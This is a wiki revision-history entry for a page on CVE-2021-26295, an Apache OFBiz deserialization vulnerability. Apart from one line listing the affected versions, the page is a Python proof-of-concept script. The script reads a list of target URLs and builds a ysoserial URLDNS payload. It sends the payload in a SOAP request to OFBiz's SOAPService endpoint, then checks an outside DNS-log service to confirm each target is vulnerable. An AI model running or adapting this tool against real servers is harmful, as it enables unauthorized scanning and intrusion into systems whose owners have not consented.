https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-26295_Apache_OFBiz_RMI%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%2Ffr
CVE-2021-26295 Apache OFBiz RMI反序列化漏洞/fr - Revision history
2026-04-04T13:45:34Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-26295_Apache_OFBiz_RMI%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/fr&diff=922&oldid=prev
Pwnwiki: Created page with "== Impact de la vulnérabilité =="
2021-04-03T02:40:07Z
<p>Created page with "== Impact de la vulnérabilité =="</p>
<p><b>New page</b></p><div><languages /><br />
== Impact de la vulnérabilité ==<br />
<br />
Apache OFBiz < 17.12.06<br />
<br />
<br />
==POC==<br />
<pre><br />
#coding:utf-8<br />
import binascii<br />
import os<br />
import requests<br />
import urllib3<br />
import uuid<br />
urllib3.disable_warnings()<br />
def main():<br />
id = requests.get("https://dns.xn--9tr.com/new_gen").text.split(".")[0]<br />
if(not os.path.exists("target.txt")):<br />
exit("put url in target.txt! ")<br />
if(not os.path.exists("ysoserial.jar")):<br />
exit("where is ysoserial.jar?")<br />
with open("target.txt")as f:<br />
urls = f.readlines()<br />
for url in urls:<br />
url = url.strip()<br />
uid = uuid.uuid1().hex<br />
cmd = "java -jar .\ysoserial.jar URLDNS http://{0}.{1}.y.dns1.tk > tmp".format(uid,id)<br />
r = os.popen(cmd) <br />
r.close() <br />
with open("tmp",'rb') as f:<br />
payload = binascii.hexlify(f.read())<br />
data = '''<br />
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <br />
<soapenv:Header/><br />
<soapenv:Body><br />
<ser><br />
<map-HashMap><br />
<map-Entry><br />
<map-Key><br />
<cus-obj>{0}</cus-obj><br />
</map-Key><br />
<map-Value><br />
<std-String value="http://baidu.com"/><br />
</map-Value><br />
</map-Entry><br />
</map-HashMap><br />
</ser><br />
</soapenv:Body><br />
</soapenv:Envelope><br />
'''.format(payload.decode())<br />
headers = {<br />
"user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36"<br />
}<br />
url = url+"/webtools/control/SOAPService"<br />
try:<br />
requests.post(url,data=data,verify=False,headers=headers,timeout=5)<br />
requests.post(url,data=data,verify=False,headers=headers,timeout=5)<br />
requests.post(url,data=data,verify=False,headers=headers,timeout=5)<br />
except:<br />
pass<br />
dnslogresurl = "https://dns.xn--9tr.com/"+id<br />
if(uid in requests.get(dnslogresurl).text):<br />
print("[+] {0} 漏洞存在".format(url))<br />
else:<br />
print("[-] {0} 漏洞不存在".format(url))<br />
print("[+] 请到 {0} 查看结果".format(dnslogresurl))<br />
<br />
if __name__ == "__main__":<br />
main()<br />
</pre></div>
Pwnwiki